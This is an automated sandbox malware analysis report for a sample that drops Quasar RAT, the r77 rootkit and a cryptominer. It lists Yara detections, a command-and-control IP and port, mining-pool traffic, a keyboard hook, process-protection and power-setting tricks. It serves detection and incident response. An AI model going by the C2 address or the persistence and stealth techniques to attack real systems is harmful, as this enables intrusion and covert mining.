Source: Yara match	File source: 63.2.sc.exe.17cd5af0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 68.2.conhost.exe.1a646d40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 63.2.sc.exe.17cd5b20000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: GR55Qg1hth.exe PID: 7540, type: MEMORYSTR

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Directory created: C:\Program Files\Cuis			Jump to behavior
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Directory created: C:\Program Files\Cuis\bon			Jump to behavior

Source: 5fr5gthkjdg71.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\InstallStager\obj\Release\InstallStager.pdb- source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\r77-x64.pdb source: sc.exe, kaptsegthwf.exe
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: 5fr5gthkjdg71.exe, 00000000.00000003.1685559832.00000209BC0DE000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp, 5fr5gthkjdg71.exe, 00000000.00000003.1684931980.00000209BB8D2000.00000004.00000020.00020000.00000000.sdmp, 5fr5gthkjdg71.exe, 00000000.00000000.1682966370.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: H:\CRYPTOCOIN\rootkit\r77-rootkit-master_1.3.0\r77-rootkit-master\vs\x64\Release\Install.pdb source: GR55Qg1hth.exe, 00000002.00000002.1972814852.000001B632A12000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C9B110 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF731C9B110
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8407C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,	0_2_00007FF731C8407C
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CAFC20 FindFirstFileExA,	0_2_00007FF731CAFC20
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B63116DCE0 FindFirstFileExW,	2_2_000001B63116DCE0
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B88DCE0 FindFirstFileExW,	10_2_1B88DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001C25C77DCE0 FindFirstFileExW,	22_2_000001C25C77DCE0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5ACDCE0 FindFirstFileExW,	63_2_0000017CD5ACDCE0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B2D604 FindFirstFileExW,	63_2_0000017CD5B2D604
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5B8DCE0 FindFirstFileExW,	63_2_0000017CD5B8DCE0
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_0000023E07F4DCE0 FindFirstFileExW,	66_2_0000023E07F4DCE0
Source: C:\Windows\System32\conhost.exe	Code function: 68_2_000001A645EEDCE0 FindFirstFileExW,	68_2_000001A645EEDCE0

Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF6502522E0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF6502522E0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF6502522E0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	2_2_00007FF6502522E0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252150
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252150
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252240
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252240
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252240
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252240
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252240
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then mov qword ptr [rsp+28h], 0000000000000000h	2_2_00007FF650252240
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then mov rax, qword ptr [rcx]	2_2_00007FF6502452E0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then sub rsp, 38h	2_2_00007FF65024BDB0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650247EB0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then sub rsp, 38h	2_2_00007FF65024EF70
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then sub rsp, 38h	2_2_00007FF650247F80
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252090
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252090
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252090
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r13	2_2_00007FF650252090
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 4x nop then push r12	2_2_00007FF65022E8C4

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 185.148.3.216

Yara detected Generic Downloader

Source: Yara match	File source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 185.148.3.216:4000

Source: Joe Sandbox View

ASN Name: MAGNA-CAPAXFI MAGNA-CAPAXFI

Source: Network traffic

Suricata IDS: 2017871 - Severity 2 - ET COINMINER W32/BitCoinMiner.MultiThreat Subscribe/Authorize Stratum Protocol Message : 192.168.2.4:49738 -> 31.220.102.19:3333

Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216
Source: unknown	TCP traffic detected without corresponding DNS query: 185.148.3.216

Source: Client.exe, 0000000A.00000002.1831773970.00000000008F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://go.micC
Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: F4R5fd8grr.exe, 00000003.00000002.1725151297.0000000003121000.00000004.00000800.00020000.00000000.sdmp, Client.exe, 0000000A.00000002.1835510769.00000000026C1000.00000004.00000800.00020000.00000000.sdmp, F4R5fd8grr.exe, 0000000B.00000002.1884972247.0000000002ABF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000013.00000002.1813131707.0000021C80001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://api.ipify.org/
Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000013.00000002.1901832546.0000021C90078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, Client.exe, 0000000A.00000002.1835510769.0000000002701000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354sCannot
Source: 5fr5gthkjdg71.exe, 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, F4R5fd8grr.exe, 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://tools.keycdn.com/geo.json

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe

Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\SubDir\Client.exe

Jump to behavior

E-Banking Fraud

Yara detected Quasar RAT

Source: Yara match	File source: 5fr5gthkjdg71.exe, type: SAMPLE
Source: Yara match	File source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000000.1691589701.0000000000EF0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1687810201.00000209BA177000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.1690944471.0000000000E72000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5fr5gthkjdg71.exe PID: 7452, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: F4R5fd8grr.exe PID: 7548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Client.exe PID: 7916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process information set: 01 00 00 00
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 5fr5gthkjdg71.exe, type: SAMPLE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 5fr5gthkjdg71.exe, type: SAMPLE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 5fr5gthkjdg71.exe, type: SAMPLE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 66.2.kaptsegthwf.exe.23e07f70000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 68.2.conhost.exe.1a646d10000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 68.2.conhost.exe.1a646d40000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 63.2.sc.exe.17cd5af0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 68.2.conhost.exe.1a646d10000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 66.2.kaptsegthwf.exe.23e07f70000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 63.2.sc.exe.17cd5b20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 63.2.sc.exe.17cd5af0000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 3.0.F4R5fd8grr.exe.e70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: 68.2.conhost.exe.1a646d40000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 63.2.sc.exe.17cd5b20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 66.2.kaptsegthwf.exe.23e07fa0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000044.00000002.2033261460.000001A646D10000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000044.00000002.2033301105.000001A646D40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0000003F.00000002.2041864998.0000017CD5AF0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 0000003F.00000002.2042008011.0000017CD5B20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000042.00000002.2031055228.0000023E07F70000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: 00000042.00000002.2031091638.0000023E07FA0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Rootkit_R77_5bab748b Author: unknown
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe, type: DROPPED	Matched rule: Detects Quasar infostealer Author: ditekshen
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: Detects QuasarRAT malware Author: Florian Roth
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: Detects Vermin Keylogger Author: Florian Roth
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: C:\Users\user\Desktop\F4R5fd8grr.exe, type: DROPPED	Matched rule: Detects Quasar infostealer Author: ditekshen

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\gfiKDLgr58thy4d.exe	Code function: 1_2_00007FF6880C1394 NtRestoreKey,	1_2_00007FF6880C1394
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650224A40 NtDelayExecution,	2_2_00007FF650224A40
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B882F04 GetProcessHeap,HeapAlloc,NtQuerySystemInformation,StrCmpNIW,GetProcessHeap,HeapFree,RtlFreeHeap,	10_2_1B882F04
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B8828C8 NtEnumerateValueKey,NtEnumerateValueKey,	10_2_1B8828C8
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B88202C NtQuerySystemInformation,StrCmpNIW,	10_2_1B88202C
Source: C:\Windows\System32\dialer.exe	Code function: 51_2_00000001400010C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	51_2_00000001400010C0
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AC2B2C NtDeviceIoControlFile,GetModuleHandleA,GetProcAddress,StrCmpNIW,lstrlenW,lstrlenW,	63_2_0000017CD5AC2B2C
Source: C:\Windows\System32\sc.exe	Code function: 63_2_0000017CD5AC28C8 NtEnumerateValueKey,NtEnumerateValueKey,	63_2_0000017CD5AC28C8
Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe	Code function: 66_2_00007FF62DC41394 NtCloseObjectAuditAlarm,	66_2_00007FF62DC41394

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe

Code function: 0_2_00007FF731C7C300: CreateFileW,CloseHandle,wcscpy,wcscpy,wcscpy,wcscpy,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,

0_2_00007FF731C7C300

Source: C:\ProgramData\mxergolzfguk\kaptsegthwf.exe

File created: C:\Windows\TEMP\dsarrsulkovb.sys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File deleted: C:\Windows\Temp\__PSScriptPolicyTest_m42dpnhz.s4a.ps1

Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8A46C	0_2_00007FF731C8A46C
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA06D4	0_2_00007FF731CA06D4
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C848E8	0_2_00007FF731C848E8
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C7F940	0_2_00007FF731C7F940
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C75E2C	0_2_00007FF731C75E2C
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C9CE08	0_2_00007FF731C9CE08
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C9B110	0_2_00007FF731C9B110
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C7A2FC	0_2_00007FF731C7A2FC
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C7C300	0_2_00007FF731C7C300
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C77288	0_2_00007FF731C77288
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C81224	0_2_00007FF731C81224
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C92150	0_2_00007FF731C92150
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8B4F0	0_2_00007FF731C8B4F0
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CB24D0	0_2_00007FF731CB24D0
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C93404	0_2_00007FF731C93404
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C95370	0_2_00007FF731C95370
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C776C0	0_2_00007FF731C776C0
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C7A664	0_2_00007FF731C7A664
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C938E4	0_2_00007FF731C938E4
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C74840	0_2_00007FF731C74840
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CAC7B8	0_2_00007FF731CAC7B8
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C71AA4	0_2_00007FF731C71AA4
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CB5A78	0_2_00007FF731CB5A78
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C92A30	0_2_00007FF731C92A30
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CAFA14	0_2_00007FF731CAFA14
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C81A00	0_2_00007FF731C81A00
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8C928	0_2_00007FF731C8C928
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA8920	0_2_00007FF731CA8920
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C92CD8	0_2_00007FF731C92CD8
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA8B9C	0_2_00007FF731CA8B9C
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C94B18	0_2_00007FF731C94B18
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C85B20	0_2_00007FF731C85B20
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8BB4C	0_2_00007FF731C8BB4C
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C91EA0	0_2_00007FF731C91EA0
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8AED4	0_2_00007FF731C8AED4
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C98D74	0_2_00007FF731C98D74
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CA06D4	0_2_00007FF731CA06D4
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731C8F100	0_2_00007FF731C8F100
Source: C:\Users\user\Desktop\5fr5gthkjdg71.exe	Code function: 0_2_00007FF731CB2000	0_2_00007FF731CB2000
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B630F61F2C	2_2_000001B630F61F2C
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B630F6D0E0	2_2_000001B630F6D0E0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B630F738A8	2_2_000001B630F738A8
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B6311744A8	2_2_000001B6311744A8
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B63116DCE0	2_2_000001B63116DCE0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_000001B631162B2C	2_2_000001B631162B2C
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF6502216C0	2_2_00007FF6502216C0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650222F30	2_2_00007FF650222F30
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF6502422D0	2_2_00007FF6502422D0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650226CA0	2_2_00007FF650226CA0
Source: C:\Users\user\Desktop\GR55Qg1hth.exe	Code function: 2_2_00007FF650222790	2_2_00007FF650222790
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B241F2C	10_2_1B241F2C
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B2538A8	10_2_1B2538A8
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B24D0E0	10_2_1B24D0E0
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B882B2C	10_2_1B882B2C
Source: C:\Users\user\AppData\Roaming\SubDir\Client.exe	Code function: 10_2_1B8944A8	10_2_1B8944A8
